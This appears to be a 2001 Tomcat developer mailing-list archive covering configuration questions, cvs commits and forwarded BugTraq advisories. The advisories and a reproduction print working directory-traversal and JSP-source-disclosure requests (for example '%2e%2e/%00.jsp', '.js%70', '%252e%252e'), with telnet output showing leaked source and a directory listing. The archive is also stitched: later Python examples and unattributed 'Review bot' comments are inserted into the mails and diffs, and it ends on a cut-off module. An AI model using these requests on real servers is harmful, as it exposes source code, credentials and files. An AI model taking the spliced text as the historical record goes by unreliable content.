non-ascii characters in URL

2001-04-04 Thread Stefan Busse

hi,

I have run into a problem with non-ASCII URL characters.

When there is e.g. the German ä (auml) in a URL,
I have to encode it as follows:

APACHE alone, non-ascii character anywhere:
http://mydomain.de/d%E4mlich.html

TOMCAT standalone, non-ascii character anywhere:
http://mydomain.de:8080/requ%E4st.jsp?dummy=d%E4mlich

APACHE+TOMCAT, non-ascii character in parameters:
http://mydomain.de/request.jsp?dummy=d%E4mlich

Now before you say, this is really getting boring,
watch out:
APACHE+TOMCAT, non-ascii character in URI-part:
http://mydomain.de/requ%C3%A4st.jsp

Obviously, in the last example, the encoding follows
Unicode rather than ISO-Latin. As this conflicts
with the "usual" behaviour shown above, I am looking
for a solution for the last case.

Does anybody know a workaround or a version of
apache or tomcat or mod_jk that would solve the problem?

Your help will be very much appreciated.

Stefan

BTW I am using:

tomcat 3.2.1
apache 1.3.19, connected through mod_jk
solaris 2.8 on intel
jdk 1.3 from sun
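The four spellings above differ only in which charset the bytes behind the %XX escapes are read in: %E4 is "ä" in ISO-8859-1, %C3%A4 is "ä" in UTF-8. As an added illustration (not from the original post), this Python snippet decodes a segment trying UTF-8 first and falling back to ISO-8859-1, re-encodes to one canonical form so both spellings compare equal, and shows why an access rule has to compare in decoded space rather than on the raw escaped string; is_ambiguous flags the case where both readings are possible. The function names and the /geschützt/ prefix are made up for the example.

```python
from urllib.parse import quote, unquote_to_bytes


def decode_segment(encoded):
    """Percent-decode one path segment or query value; return (text, charset).

    The bytes behind %XX escapes carry no charset of their own: %E4 is
    'ä' only if the producer meant ISO-8859-1, %C3%A4 is 'ä' in UTF-8.
    Try UTF-8 first (strict, so a stray Latin-1 byte fails fast) and fall
    back to ISO-8859-1, reporting which reading succeeded so mixed traffic
    can be logged.
    """
    raw = unquote_to_bytes(encoded)
    try:
        return raw.decode("utf-8"), "utf-8"
    except UnicodeDecodeError:
        # Every byte string is valid ISO-8859-1, so this cannot fail.
        return raw.decode("iso-8859-1"), "iso-8859-1"


def is_ambiguous(encoded):
    """True when the bytes are non-ASCII yet valid UTF-8: the Latin-1 reading
    (e.g. 'Ã¤' for %C3%A4) exists too, and only the producer knows which
    one was meant.  Pure Latin-1 input like %E4 is not ambiguous."""
    raw = unquote_to_bytes(encoded)
    if all(b < 0x80 for b in raw):
        return False
    try:
        raw.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return True


def canonical_form(encoded):
    """Re-encode as UTF-8 percent escapes so both spellings compare equal."""
    text, _ = decode_segment(encoded)
    return quote(text.encode("utf-8"))


def same_resource(a, b):
    """True when two encoded names denote the same decoded name."""
    return canonical_form(a) == canonical_form(b)


def is_under_protected_prefix(encoded_path, protected_prefix):
    """Apply an access rule in decoded space, not on the raw escaped string.

    A rule written as a string compare on the raw URL would cover
    '/gesch%C3%BCtzt/' but not '/gesch%FCtzt/', although the file mapping
    on the other end may well treat both as the same directory.
    """
    path, _ = decode_segment(encoded_path)
    return path.startswith(protected_prefix)
```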






jsp:include problem

2001-04-04 Thread Keller, Dirk 2385 EXT GCS-NP

Are there any problems in using jakarta-tomcat-3.2.1 and the jsp:include
statement?

The jsp:include statement, running well on older versions, doesn't work on
jakarta-tomcat-3.2.1 with jdk 1.2.2.  There is no corresponding code segment
within the JAVA-file generated by the JSP-engine.

Regards, 

Dirk Keller




servlet

2001-04-04 Thread pushpendra . singh

I am developing a web page, which will have the link to copyright protected
reference materials. I will be using some web-builder tool such as
FrontPage or Dreamweaver.
The problem faced is the implementation of access control over the reference
material, which is nothing but PDF files. The control should be such that
when a user is accessing, viewing or using a file no other user should
be able to view or access that file, i.e. one user, one file at a time.
I am in a fix, what to do?
Should I use the SingleThreadModel interface of servlet or JSP to develop
this control? But I am afraid that I will end up writing 300 servlet
classes each corresponding to one PDF file.
Any suggestions addressing this problem?
Thanking you.

Pushpendra Singh.




Re: context factories

2001-04-04 Thread Torgeir Veimo

"Craig R. McClanahan" wrote:
 
 If you don't mind specifying the resource factory class yourself, you
 don't need to modify any code at all -- just configure it in server.xml
 like this:
 
   <Context path="/myapp" ...>
     ...
     <Resource name="jndi/ContextPool"
       type="com.mycompany.ContextPool"/>
     <ResourceParams name="jndi/ContextPool">
       <parameter>
         <name>factory</name>
         <value>com.mycompany.ContextPoolFactory</value>
       </parameter>
       <parameter><name>name</name><value>value</value></parameter>
       ...
     </ResourceParams>
     ...
   </Context>
 
 where "com.mycompany.ContextPoolFactory" is a class that implements
 javax.naming.spi.ObjectFactory.  You can use the existing factories as
 examples of how such factories can access the declared resource parameters
 and use them to configure the object itself.

Ok, I've configured this, and all I get back from the initCtx.lookup()
method is a ResourceRef, not a ContextPool. 

I have found the reason for this to be that the "instanceof" check in
the getObjectInstance() method in
org.apache.naming.factory.ResourceFactory fails, and this must be due to
classloader issues.

What are the magic spells I need to cast to get classloading right? 

Can I put the ContextPoolFactory in an independent jar file in lib,
common/lib or server/lib?


-- 
- Torgeir



TC3.2.x and security problems

2001-04-04 Thread Marc Saegesser

Has anyone on tomcat-dev been able to reproduce these problems using Tomcat
3.2.x?  I've been trying to reproduce the error using 3.2.1, 3.2.2b2 and
even 3.1.1.  So far I always get a 404.  I've never been able to get
directory listing or JSP source.

The beta 2 time period is just about over.  With the exception of this
reported security problem, no critical bugs have been found during this beta
cycle.  I plan to call the final release vote soon, but I want to make sure
this security problem isn't real before I do that.

  Original Message 
 From: [EMAIL PROTECTED] (Jon Stevens)
 Subject: Re: CHINANSL Security Advisory(CSA-200108)
 Newsgroups: lists.bugtraq

 on 3/30/01 11:26 PM, "lovehacker" [EMAIL PROTECTED] wrote:

  Topic:
  Tomcat 3.2.1 for win2000 Directory traversal
  Vulnerability
 
  vulnerable:
  Tomcat 3.2.1 for win2000
  maybe for other operating system also.
 
  discussion:
  A security vulnerability has been found in Windows
  NT/2000 systems that have Tomcat 3.2.1 installed. The
  vulnerability allows remote attackers to access files
  outside the document root directory scope.
 
  exploits:
  http://target:8080/%2e%2e/%2e%2e/%00.jsp
  It is possible to cause the Tomcat server to list
  outside the document root directory scope.
 
  solution:
  None
 
  Copyright 2000-2001 CHINANSL. All Rights
  Reserved. Terms of use.
 
  CHINANSL Security Team
  [EMAIL PROTECTED]
  CHINANSL INFORMATION TECHNOLOGY CO.,LTD
  (http://www.chinansl.com)

 What is with this Copyright stuff?

 #1. Please report security issues to [EMAIL PROTECTED] and/or
 [EMAIL PROTECTED] first. It seems like that is a common
 courtesy.

 #2. Please test against the latest Tomcat 4.0 which is 4.0b2. I believe
 that this has already been fixed.

 p.s. Your [EMAIL PROTECTED] email address bounces.

 -jon




RE: servlet

2001-04-04 Thread Emmanuel Lécharny

A suggestion :

First, you really need to manage a session for each user, because when a
user gets the file, he must release it when he has read it. That means that
either he sends another request to release the file or the session has
timed out, which leads to the file's release.

Second, what you can do is to keep a kind of association between a file and
a user. When another user requests an already used page, you should parse
this association to see if the file is used by somebody or not.

Third, this association must be persistent. Just use a static class that
will be loaded once and used many times, and will never be discarded until
the server dies.

Fourth, be careful with concurrent access to this association. When you are
searching in the association, you must be alone doing it. If not, you won't
be able to avoid multiple accesses to a file.


Emmanuel Lécharny, IKTEK
06 08 33 32 61, www.iktek.com http://www.iktek.com


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, 4 April 2001 14:38
To: [EMAIL PROTECTED]
Subject: servlet


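The four points in the reply above, as an added Python example (not from the original reply; Python is used here instead of servlet Java so it runs stand-alone): a single shared lease registry keyed by session, a lock around every check-then-set, an inactivity timeout standing in for the session timeout, a release hook for session invalidation, and a small race showing that only one of many concurrent requests wins a file. The class, method and file names are assumptions.

```python
import threading
import time


class FileLeaseRegistry:
    """One user, one file at a time, following the reply's four points:
    leases keyed by session, one shared file -> (session, last touched)
    map, a single long-lived instance, and a lock around every
    check-then-set.  A lease also lapses after `timeout` idle seconds,
    covering the user who never sends the release request.
    """

    def __init__(self, timeout, clock=time.monotonic):
        self._timeout = timeout
        self._clock = clock            # injectable so expiry is testable
        self._lock = threading.Lock()
        self._leases = {}              # file name -> (session id, last touched)

    def acquire(self, file_name, session_id):
        """True if session_id now holds the file (fresh, refreshed, or taken
        over from a lapsed holder); False if someone else still holds it."""
        now = self._clock()
        with self._lock:               # check and set must be one step
            holder = self._leases.get(file_name)
            if holder is not None:
                owner, touched = holder
                if owner != session_id and now - touched < self._timeout:
                    return False
            self._leases[file_name] = (session_id, now)
            return True

    def release(self, file_name, session_id):
        """Only the owner may release; anyone else gets False."""
        with self._lock:
            holder = self._leases.get(file_name)
            if holder is None or holder[0] != session_id:
                return False
            del self._leases[file_name]
            return True

    def release_all(self, session_id):
        """Session-timeout hook: drop every lease of one session, return count."""
        with self._lock:
            mine = [f for f, (owner, _) in self._leases.items() if owner == session_id]
            for f in mine:
                del self._leases[f]
            return len(mine)


class FakeClock:
    """Manual clock so expiry can be exercised without sleeping."""

    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now


def race_for_file(workers, file_name="paper-001.pdf"):
    """Let `workers` sessions hit acquire() for the same file at once and
    count the winners; the lock guarantees exactly one."""
    registry = FileLeaseRegistry(timeout=60)   # one shared instance
    start = threading.Barrier(workers)
    winners = []

    def worker(i):
        start.wait()                   # all threads reach acquire() together
        if registry.acquire(file_name, "session-%d" % i):
            winners.append(i)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return len(winners)


def walkthrough():
    """Scripted sequence on a fake clock; returns the observable outcomes."""
    clock = FakeClock()
    reg = FileLeaseRegistry(timeout=60, clock=clock)
    out = [
        reg.acquire("a.pdf", "s1"),    # free -> s1 takes it
        reg.acquire("a.pdf", "s2"),    # held by s1 -> refused
        reg.acquire("a.pdf", "s1"),    # owner again: refresh, still True
        reg.release("a.pdf", "s2"),    # not the owner -> refused
        reg.release("a.pdf", "s1"),    # owner releases
        reg.acquire("a.pdf", "s2"),    # now free -> s2 takes it
    ]
    clock.now += 61                    # s2 idles past the timeout
    out += [
        reg.acquire("a.pdf", "s3"),    # lapsed lease can be taken over
        reg.release_all("s3"),         # session ends: 1 lease dropped
    ]
    return out
```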




Re: context factories

2001-04-04 Thread Torgeir Veimo

Btw, if I replace the instanceof test with a 

getClass().getName().equals("org.apache.naming.ResourceRef") 

it all works. 

-- 
- Torgeir



FW: Cocoon on iSeries = mod_jk is in use.

2001-04-04 Thread GOMEZ Henri

Just look what an AS/400 user sent me.

Thanks to Gal Shachor (ServletExpress  WebSphere).

-Original Message-
From: David Morris [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, April 04, 2001 5:12 PM
To: [EMAIL PROTECTED]
Subject: RE: Cocoon on iSeries


Henri,

While investigating how the new Apache admin instance runs servlets without
WebSphere, I looked at the Apache config file.  I found the following:

# Servlet engine directives
LoadModule jk_module /QSYS.LIB/QHTTPSVR.LIB/QZTCJK.SRVPGM
JkWorkersFile /QIBM/ProdData/HTTPA/admin/conf/workers.properties
JkLogFile /QIBM/UserData/HTTPA/admin/logs/jk.log
JkLogLevel error
JkMount /HTTPAdmin jni
JkMount /HTTPAdmin/* jni
JkMount /BtoB/Connect jni
JkMount /BtoB/Connect/* jni

By looking at the WebSphere plug-in config, I am reasonably certain that this
is a port of mod_jk.

David Morris

 GOMEZ Henri [EMAIL PROTECTED] 04/03/01 02:13AM 
http://www-1.ibm.com/servers/eserver/iseries/software/http/ 

Take the HTTP Server (powered by Apache) link. This will tell
you everything you need to know about Apache on iSeries.

Fine site; how could they have an Apache 2.0 since it's still
at alpha-15 at Apache?

BTW, where did you get the mod_jk ?...




[Fwd: Tomcat may reveal script source code by URL trickery]

2001-04-04 Thread Craig R. McClanahan

Reported against Tomcat 3.2.1 on BugTraq.

Craig


Eric Daniel Mauricio wrote:

 There is another way to get the source from a jsp page using Tomcat.

 If you don't write HTTP/1.0 or HTTP/1.1 at the end of the GET request,
 you will get the source code and not the processed jsp.

 In other words, use Apache + Tomcat if you intend to protect your source code.

 telnet maq106 8080
 Trying 10.0.0.106...
 Connected to maq106
 Escape character is '^]'.
 GET /examples/jsp/num/numguess.jsp
 HTTP/1.0 200 OK
 Content-Type: text/plain
 Content-Length: 1237
 Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
 Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
 Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)

 <!--
   Copyright (c) 1999 The Apache Software Foundation.  All rights
   reserved.

   Number Guess Game
   Written by Jason Hunter, CTO, KA Software
   http://www.servlets.com
 -->

 <%@ page import = "num.NumberGuessBean" %>

 <jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/>
 <jsp:setProperty name="numguess" property="*"/>

 <html>
 <head><title>Number Guess</title></head>
 <body bgcolor="white">
 <font size=4>

 <% if (numguess.getSuccess()) { %>

   Congratulations!  You got it.
   And after just <%= numguess.getNumGuesses() %> tries.<p>

   <% numguess.reset(); %>

   Care to <a href="numguess.jsp">try again</a>?

 <% } else if (numguess.getNumGuesses() == 0) { %>

   Welcome to the Number Guess game.<p>

   I'm thinking of a number between 1 and 100.<p>

   <form method=get>
   What's your guess? <input type=text name=guess>
   <input type=submit value="Submit">
   </form>

 <% } else { %>

   Good guess, but nope.  Try <b><%= numguess.getHint() %></b>.

   You have made <%= numguess.getNumGuesses() %> guesses.<p>

   I'm thinking of a number between 1 and 100.<p>

   <form method=get>
   What's your guess? <input type=text name=guess>
   <input type=submit value="Submit">
   </form>

 <% } %>

 </font>
 </body>
 </html>
 Connection closed by foreign host.

 [],

ericmau

 "Sverre H. Huseby" [EMAIL PROTECTED] wrote:

  Tomcat may reveal script source code by URL trickery
  
 
  Sverre H. Huseby advisory 2001-03-29
 
 
 
  Systems affected
  
 
  Tomcat 4.0-b1 (latest milestone) and nightly build as of 2001-03-28
  tested.  Other versions may be vulnerable too.  The problem is only
  present when using Tomcat's built-in web server, not when using Tomcat
  with Apache Web Server.
 
 
  Description
  ---
 
  Tomcat (http://jakarta.apache.org/tomcat/), the Reference
  Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
  Technologies, may be tricked into revealing the source code of JSP
  scripts by using simple URL encoding.
 
 
  Details
  ---
 
  It seems that the built-in web server in Tomcat does URL decoding in
  an unreasonable order.  URLs like the following

http://XXX:8080/examples/jsp/num/numguess.js%70

  where %70 is a URL-encoded 'p', returns the source code of index.jsp
  rather than running the script on the server side.
 
  To speculate: The JSP handler is skipped as this URL does not end in
  ".jsp", but the static file handler is nevertheless able to map the
  URL into a correct file name.
 
 
  Impact
  --
 
  This design error makes it possible to fetch the source code of JSP
  scripts.  Such source code may contain database passwords and file
  names, and may reveal design errors or programming bugs that make it
  possible to further exploit the server or service.
 
 
 
  Reported by Sverre H. Huseby, [EMAIL PROTECTED]
 
  --
  <URL:mailto:[EMAIL PROTECTED]>
  <URL:http://shh.thathost.com/>
 




RE: [Fwd: Tomcat may reveal script source code by URL trickery]

2001-04-04 Thread GOMEZ Henri

TC 4.0B3 sources still missing in :

http://jakarta.apache.org/builds/jakarta-tomcat-4.0/release/v4.0-b3/src/




Re: [Fwd: Tomcat may reveal script source code by URL trickery]

2001-04-04 Thread Jon Stevens

I know that these are just minor bugs in Tomcat (and other servlet
containers as well), but man, this is getting ridiculous. This is clearly
yet another reason to not use JSP. Especially when you have sites like this:

http://www.devshed.com/Server_Side/Jserv/JSP5/page3.html

Actually *encouraging* people to put their usernames and passwords into
their JSP files. The term "Gross negligence" comes to mind.

-jon


on 4/4/01 9:08 AM, "Craig R. McClanahan" [EMAIL PROTECTED]
wrote:





RE: [Fwd: Tomcat may reveal script source code by URL trickery]

2001-04-04 Thread Marc Saegesser

This is already fixed in 3.2.2.


 -Original Message-
 From: Craig R. McClanahan [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, April 04, 2001 11:09 AM
 To: [EMAIL PROTECTED]
 Subject: [Fwd: Tomcat may reveal script source code by URL trickery]






Re: [Fwd: Tomcat may reveal script source code by URL trickery]

2001-04-04 Thread Daniel Lopez

You're right!
That's another reason to use a model 2 based approach but, of course, JSP still
allows you to shoot yourself in the foot if you are foolish enough to do so. That's one
of the reasons we chose a model 2 based approach with XML-XSLT for the interface
creation, no JSP involved: no feet in danger ;).
just my 2c,
Dan

Jon Stevens wrote:

 I know that these are just minor bugs in Tomcat (and other servlet
 containers as well), but man, this is getting ridiculous. This is clearly
 yet another reason to not use JSP. Especially when you have sites like this:

 http://www.devshed.com/Server_Side/Jserv/JSP5/page3.html

 Actually *encouraging* people to put their usernames and passwords into
 their JSP files. The term "Gross negligence" comes to mind.

 -jon


...snip for brevity's sake




cvs commit: jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/util Base64.java

2001-04-04 Thread remm

remm        01/04/04 11:12:19

  Modified:    catalina/src/share/org/apache/catalina/util Base64.java
  Log:
  - Update to the new version of the Xerces Base64 encoder/decoder.
    The old one had problems encoding binary content.
  
  Revision  Changes    Path
  1.2       +77 -49    jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/util/Base64.java
  
  Index: Base64.java
  ===
  RCS file: 
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/util/Base64.java,v
  retrieving revision 1.1
  retrieving revision 1.2
  diff -u -r1.1 -r1.2
  --- Base64.java   2000/08/11 17:01:49 1.1
  +++ Base64.java   2001/04/04 18:12:19 1.2
  @@ -1,7 +1,7 @@
   /*
  - * $Header: 
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/util/Base64.java,v 
1.1 2000/08/11 17:01:49 craigmcc Exp $
  - * $Revision: 1.1 $
  - * $Date: 2000/08/11 17:01:49 $
  + * $Header: 
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/util/Base64.java,v 
1.2 2001/04/04 18:12:19 remm Exp $
  + * $Revision: 1.2 $
  + * $Date: 2001/04/04 18:12:19 $
*
* 
*
  @@ -67,36 +67,35 @@
   
   /**
* This class provides encode/decode for RFC 2045 Base64 as
  - * defined by RFC 2045, N. Freed and N. Borenstein.
  + * defined by RFC 2045, N. Freed and N. Borenstein. 
* RFC 2045: Multipurpose Internet Mail Extensions (MIME)
* Part One: Format of Internet Message Bodies. Reference
  - * 1996 Available at: http://www.ietf.org/rfc/rfc2045.txt
  + * 1996 Available at: http://www.ietf.org/rfc/rfc2045.txt 
* This class is used by XML Schema binary format validation
*
* @author Jeffrey Rodriguez
  - * @version $Revision: 1.1 $ $Date: 2000/08/11 17:01:49 $
  + * @version $Id: Base64.java,v 1.2 2001/04/04 18:12:19 remm Exp $
*/
   
  -public final class Base64 {
  -
  -
  -static private final int  BASELENGTH = 255;
  -static private final int  LOOKUPLENGTH   = 63;
  +public final class  Base64 {
  +static private final int  BASELENGTH = 255;   
  +static private final int  LOOKUPLENGTH   = 64;
   static private final int  TWENTYFOURBITGROUP = 24;
   static private final int  EIGHTBIT   = 8;
   static private final int  SIXTEENBIT = 16;
   static private final int  SIXBIT = 6;
   static private final int  FOURBYTE   = 4;
  -
  -
  -static private final byte PAD   = ( byte ) '=';
  -static private byte [] base64Alphabet   = new byte[BASELENGTH];
  +static private final int  SIGN   = -128;
  +static private final byte PAD= ( byte ) '=';
  +static private final boolean fDebug  = false;
  +static private byte [] base64Alphabet   = new byte[BASELENGTH]; 
   static private byte [] lookUpBase64Alphabet = new byte[LOOKUPLENGTH];
   
  +
   static {
   
   for (int i = 0; iBASELENGTH; i++ ) {
  -base64Alphabet[i] = -1;
  +base64Alphabet[i] = -1; 
   }
   for ( int i = 'Z'; i = 'A'; i-- ) {
   base64Alphabet[i] = (byte) (i-'A');
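Review bot: the one behavioural change in this hunk is `LOOKUPLENGTH` going from 63 to 64, and that is the actual fix: the encoder's lookup table holds 64 symbols, so with 63 slots the later `lookUpBase64Alphabet[63] = (byte) '/';` write would throw ArrayIndexOutOfBoundsException. The log message should say so rather than "had problems encoding binary content". The hunk also introduces `SIGN` and `fDebug`, neither referenced in the visible lines, and appends trailing whitespace to otherwise unchanged lines (`BASELENGTH = 255;   `, `base64Alphabet[i] = -1; `), which pads the diff with no-op changes.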
  @@ -109,10 +108,10 @@
   base64Alphabet[i] = (byte) (i-'0' + 52);
   }
   
  -base64Alphabet['+']  = 62;
  +base64Alphabet['+']  = 62; 
   base64Alphabet['/']  = 63;
   
  -   for (int i = 0; i=25; i++ )
  +for (int i = 0; i=25; i++ )
   lookUpBase64Alphabet[i] = (byte) ('A'+i );
   
   for (int i = 26,  j = 0; i=51; i++, j++ )
  @@ -120,17 +119,23 @@
   
   for (int i = 52,  j = 0; i=61; i++, j++ )
   lookUpBase64Alphabet[i] = (byte) ('0' + j );
  +lookUpBase64Alphabet[62] = (byte) '+';
  +lookUpBase64Alphabet[63] = (byte) '/';
   
   }
   
  +public static boolean isBase64( String isValidString ){
  +return( isArrayByteBase64( isValidString.getBytes()));
  +}
  +
   
  -static boolean isBase64( byte octect ) {
  +public static boolean isBase64( byte octect ) {
   //shall we ignore white space? JEFF??
  -return(octect == PAD || base64Alphabet[octect] != -1 );
  +return(octect == PAD || base64Alphabet[octect] != -1 ); 
   }
   
   
  -static boolean isArrayByteBase64( byte[] arrayOctect ) {
  +public static boolean isArrayByteBase64( byte[] arrayOctect ) {
   int length = arrayOctect.length;
   if ( length == 0 )
   return false;
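Review bot: `isBase64( byte octect )` becomes public and `isBase64( String )` now feeds it arbitrary input via `getBytes()`, but `base64Alphabet[octect]` indexes with a signed Java byte: any octet of 0x80 or above is negative, and the lookup throws ArrayIndexOutOfBoundsException instead of returning false. Mask before indexing (`base64Alphabet[octect & 0xFF]`, which in turn needs `BASELENGTH` to be 256 rather than 255) or reject out-of-range values explicitly. `getBytes()` with no charset argument also depends on the platform default encoding; pass an explicit one. The `//shall we ignore white space? JEFF??` comment is carried over unresolved.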
  @@ -143,13 +148,13 @@
   
   /**
* Encodes hex octects into Base64
  - *
  + * 
* @param binaryData Array containing binaryData
* @return Encoded Base64 array
*/
  -public byte[] encode( byte[] binaryData ) {
  +public static byte[] encode( byte[] binaryData ) {
   int  
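Review bot: `encode` changes from an instance method to `public static`, which breaks any caller that held a `Base64` instance; that API change deserves a line in the log message. The rest of this hunk is truncated in the mail, so the body of the new `encode` cannot be reviewed from what is visible here.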

cvs commit: jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/servlets WebdavServlet.java

2001-04-04 Thread remm

remm        01/04/04 11:23:08

  Modified:    catalina/src/share/org/apache/catalina/servlets
               WebdavServlet.java
  Log:
  - Fix thread safety problems with the WebDAV servlet. The problem was
    that the JAXP document builder was not thread safe. Now, a new instance
    will be created on each request.
    The problem was reported and fixed by Juergen Pill in Slide, but I forgot to
    backport the fix (sorry ...), and it was reported again by Max du Prel mduprel at
    leveld.de
  
  Revision  Changes    Path
  1.14      +23 -13    jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/servlets/WebdavServlet.java
  
  Index: WebdavServlet.java
  ===
  RCS file: 
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/servlets/WebdavServlet.java,v
  retrieving revision 1.13
  retrieving revision 1.14
  diff -u -r1.13 -r1.14
  --- WebdavServlet.java2001/03/06 02:27:44 1.13
  +++ WebdavServlet.java2001/04/04 18:23:06 1.14
  @@ -1,7 +1,7 @@
   /*
  - * $Header: 
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/servlets/WebdavServlet.java,v
 1.13 2001/03/06 02:27:44 remm Exp $
  - * $Revision: 1.13 $
  - * $Date: 2001/03/06 02:27:44 $
  + * $Header: 
/home/cvs/jakarta-tomcat-4.0/catalina/src/share/org/apache/catalina/servlets/WebdavServlet.java,v
 1.14 2001/04/04 18:23:06 remm Exp $
  + * $Revision: 1.14 $
  + * $Date: 2001/04/04 18:23:06 $
*
* 
*
  @@ -125,7 +125,7 @@
* are handled by the DefaultServlet.
*
* @author Remy Maucherat
  - * @version $Revision: 1.13 $ $Date: 2001/03/06 02:27:44 $
  + * @version $Revision: 1.14 $ $Date: 2001/04/04 18:23:06 $
*/
   
   public class WebdavServlet
  @@ -215,9 +215,9 @@
   
   
   /**
  - * JAXP Document builder.
  + * JAXP Document builder factory.
*/
  -private DocumentBuilder documentBuilder;
  +private DocumentBuilderFactory documentBuilderFactory;
   
   
   /**
  @@ -275,13 +275,7 @@
;
}
   
  -try {
  -documentBuilder = 
  -DocumentBuilderFactory.newInstance().newDocumentBuilder();
  -} catch(ParserConfigurationException e) {
  -throw new ServletException
  -(sm.getString("webdavservlet.jaxpfailed"));
  -}
  +documentBuilderFactory = DocumentBuilderFactory.newInstance();
   
   }
   
  @@ -431,7 +425,15 @@
   
   Node propNode = null;
   
  +DocumentBuilder documentBuilder = null;
   try {
  +documentBuilder = documentBuilderFactory.newDocumentBuilder();
  +} catch(ParserConfigurationException e) {
  +throw new ServletException
  +(sm.getString("webdavservlet.jaxpfailed"));
  +}
  +
  +try {
   Document document = documentBuilder.parse
   (new InputSource(req.getInputStream()));
   
  @@ -839,6 +841,14 @@
   int lockRequestType = LOCK_CREATION;
   
   Node lockInfoNode = null;
  +
  +DocumentBuilder documentBuilder = null;
  +try {
  +documentBuilder = documentBuilderFactory.newDocumentBuilder();
  +} catch(ParserConfigurationException e) {
  +throw new ServletException
  +(sm.getString("webdavservlet.jaxpfailed"));
  +}
   
   try {
   Document document = documentBuilder.parse(new InputSource
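Review bot: same duplicated builder-creation block as in the propNode hunk above; route both call sites through one helper so the two copies cannot drift apart.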
  
  
  



Just say no to JSP Re: [Fwd: Tomcat may reveal script sourcecode by URL trickery]

2001-04-04 Thread Jon Stevens

on 4/4/01 11:06 AM, "Brad Cox" [EMAIL PROTECTED] wrote:

 My article about a servlet-based alternative to JSP is in this
 month's Dr. Dobbs Journal and at
 http://www.ddj.com/articles/2001/0105/0105i/0105i.htm. The draft with
 source code is at http://virtualschool.edu/wap.

I love the article title:

"Just say no to JSP"

I'm so happy to see that more and more people are waking up to the fact that
JSP is bad. I'm also happy to see you worry about form validation issues.
That is a problem that we are currently solving in Turbine right now. It is
called "Intake". :-)

It is sad to me that you:

#0. Apache/JServe. Can't spell the product name correctly even though it has
been around for 4+ years. :-)

#1. Confused "Turbine" with "add programming language features to HTML".

#2. Confused "WebMacro" and thus Velocity with "add programming language
features to HTML".

If you spend time with the products, you would see that isn't the case and
you might actually retract your statements.

I have more comments, but no time right now and this probably isn't the
right forum anyway...

:-)

-jon




[T4b3] mod_webapps

2001-04-04 Thread Pae Choi

Folks,

I am having a problem making the mod_webapp module for NT by following the
instructions in server.xml with gcc. It would be nice to have
either an already-built module or a VC++ makefile for WIN32. Is this too
much to ask?


Pae





Re: TC3.2.x and security problems

2001-04-04 Thread Stephan Seyboth

On Wed, Apr 04, 2001 at 08:35:11AM -0500, Marc Saegesser wrote:
 Has anyone on tomcat-dev been able to reproduce these problems using Tomcat
 3.2.x?  I've been trying to reproduce the error using 3.2.1, 3.2.2b2 and
 even 3.1.1.  So far I always get a 404.  I've never been able to get
 directory listing or JSP source.

[...]

   exploits:
   http://target:8080/%2e%2e/%2e%2e/%00.jsp
   It is possible to cause the Tomcat server to list
   outside the document root directory scope.

I can't reproduce that one, but could verify the following problems
on Linux:

$ telnet localhost 8080
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT
Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
 
[numguess.jsp source follows]
 
$ telnet localhost 8180
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp%00
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Wed, 04 Apr 2001 10:37:30 GMT
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
 
[numguess.jsp source follows]

$ telnet localhost 8180
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /%252e%252e/%252e%252e/%00.jsp
 
HTTP/1.0 200 OK
Content-Type: text/html;charset=ISO-8859-1
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)

[directory listing follows]

-- 
Stephan Seyboth - Developer
Caldera (Deutschland) GmbH
http://www.caldera.de/
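The two cases that reproduce above (a trailing `%00` and a double-encoded `%252e%252e` traversal) are both failures to canonicalize the request path before it is mapped to a file. The following is an added example, not Tomcat code and not from this thread, of the checks a container or front-end filter needs so that such requests are refused before any file lookup: percent-decode exactly once, reject a NUL byte, reject anything that is still percent-encoded after the first decode, and resolve dot segments against the document root without ever climbing above it. `DOC_ROOT`, the function names and the sample requests are assumptions constructed for the example.

```python
"""Canonicalize a request path before it is mapped to a file.

Added example, not Tomcat code: it shows the checks a servlet container or
front-end filter needs so that the %00 and %252e%252e requests seen in this
thread are rejected before any file lookup. DOC_ROOT is a constructed value.
"""
from urllib.parse import unquote_to_bytes

DOC_ROOT = "/var/tomcat/webapps/ROOT"   # constructed for the example

# Percent-sequences that must not survive a single decode. If they do, the
# client double-encoded them (%252e -> %2e) to slip past a decoder that runs
# once on the way in and again at file-mapping time.
SUSPICIOUS_AFTER_DECODE = (b"%2e", b"%2f", b"%5c", b"%00")


class RejectedPath(ValueError):
    """Raised when a request path fails canonicalization."""


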